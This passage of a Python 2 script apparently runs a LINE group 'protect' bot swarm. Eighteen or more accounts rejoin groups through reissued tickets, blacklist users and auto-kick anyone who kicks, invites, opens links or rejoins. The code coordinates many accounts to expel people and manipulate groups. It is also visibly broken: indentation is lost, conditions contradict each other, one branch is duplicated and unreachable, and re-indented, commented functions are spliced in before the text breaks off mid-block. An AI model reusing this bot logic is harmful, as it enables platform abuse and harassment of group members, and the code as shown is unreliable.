G.preventJoinByTicket = True
ki11.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki12mid:
if op.param2 in ki11mid:
G = ki11.getGroup(op.param1)
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki11.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki11.updateGroup(G)
else:
G = ki11.getGroup(op.param1)
ki10.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki11.updateGroup(G)
Ticket = ki11.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki12.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki13mid:
if op.param2 in ki12mid:
G = ki12.getGroup(op.param1)
G.preventJoinByTicket = False
ki12.updateGroup(G)
Ticket = ki12.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki12.updateGroup(G)
else:
G = ki12.getGroup(op.param1)
ki12.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki12.updateGroup(G)
Ticket = ki12.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki13.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki14mid:
if op.param2 in ki13mid:
G = ki13.getGroup(op.param1)
G.preventJoinByTicket = False
ki13.updateGroup(G)
Ticket = ki13.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki13.updateGroup(G)
else:
G = ki13.getGroup(op.param1)
ki13.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki13.updateGroup(G)
Ticket = ki13.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki14.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki15mid:
if op.param2 in ki14mid:
G = ki14.getGroup(op.param1)
G.preventJoinByTicket = False
ki14.updateGroup(G)
Ticket = ki14.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki14.updateGroup(G)
else:
G = ki14.getGroup(op.param1)
ki14.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki14.updateGroup(G)
Ticket = ki14.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki15.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki16mid:
if op.param2 in ki15mid:
G = ki15.getGroup(op.param1)
G.preventJoinByTicket = False
ki15.updateGroup(G)
Ticket = ki15.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki15.updateGroup(G)
else:
G = ki15.getGroup(op.param1)
ki15.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki15.updateGroup(G)
Ticket = ki15.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki16.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki17mid:
if op.param2 in ki16mid:
G = ki16.getGroup(op.param1)
G.preventJoinByTicket = False
ki16.updateGroup(G)
Ticket = ki16.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki16.updateGroup(G)
else:
G = ki16.getGroup(op.param1)
ki16.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki16.updateGroup(G)
Ticket = ki16.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki17.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in mid:
if op.param2 in ki18mid:
G = ki18.getGroup(op.param1)
G.preventJoinByTicket = False
ki18.updateGroup(G)
Ticket = ki18.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki18.updateGroup(G)
else:
G = ki18.getGroup(op.param1)
ki18.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki18.updateGroup(G)
Ticket = ki18.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki18.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki18mid:
if op.param2 in ki17mid:
G = ki17.getGroup(op.param1)
G.preventJoinByTicket = False
ki17.updateGroup(G)
Ticket = ki17.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki17.updateGroup(G)
else:
G = ki17.getGroup(op.param1)
ki17.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki17.updateGroup(G)
Ticket = ki17.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki18.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki18mid:
if op.param2 in ki14mid:
G = ki14.getGroup(op.param1)
G.preventJoinByTicket = False
ki14.updateGroup(G)
Ticket = ki14.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki14.updateGroup(G)
else:
G = ki14.getGroup(op.param1)
ki14.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki14.updateGroup(G)
Ticket = ki14.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki18.updateGroup(G)
except:
pass
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki5.updateGroup(G)
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
# pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
# random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in Bots:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
else:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[contact.mid for contact in cl.getGroup(op.param1).invitee])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[contact.mid for contact in cl.getGroup(op.param1).invitee])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open Kick finish-----#
#------invite Kick start------#
if op.type == 13:
if wait["inviteprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------invite Kick finish-----#
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
cl.sendText
if op.type == 59:
print op
except Exception as error:
print error
def a2():
    """Return False when the current minute is a multiple of ten, else True.

    Apparently intended as a throttle (see the commented-out ``while a2()``
    loop in nameUpdate): callers spin while this is True and proceed on
    :00/:10/:20/:30/:40/:50.
    """
    now2 = datetime.now()
    nowT = datetime.strftime(now2, "%M")
    # BUG FIX: "%M" yields a two-character minute string ("00".."59"), so the
    # original slice nowT[14:] was always "" and the function always returned
    # True. Compare the minute string itself instead.
    if nowT in ["10", "20", "30", "40", "50", "00"]:
        return False
    else:
        return True
def nameUpdate():
    # Background worker: while the "clock" flag in the global `wait` dict is
    # on, append the current time "(HH:MM)" to the configured base name
    # (wait["cName"]) and push it via updateProfile, sleeping 0.3s per pass.
    # NOTE(review): the nesting below is reconstructed — this chunk lost its
    # indentation; confirm whether time.sleep runs every iteration or only
    # when the clock flag is set.
    while True:
        try:
            #while a2():
            #pass
            if wait["clock"] == True:
                now2 = datetime.now()
                nowT = datetime.strftime(now2,"(%H:%M)")
                profile = cl.getProfile()
                profile.displayName = wait["cName"] + nowT
                cl.updateProfile(profile)
            time.sleep(0.30)
        except:
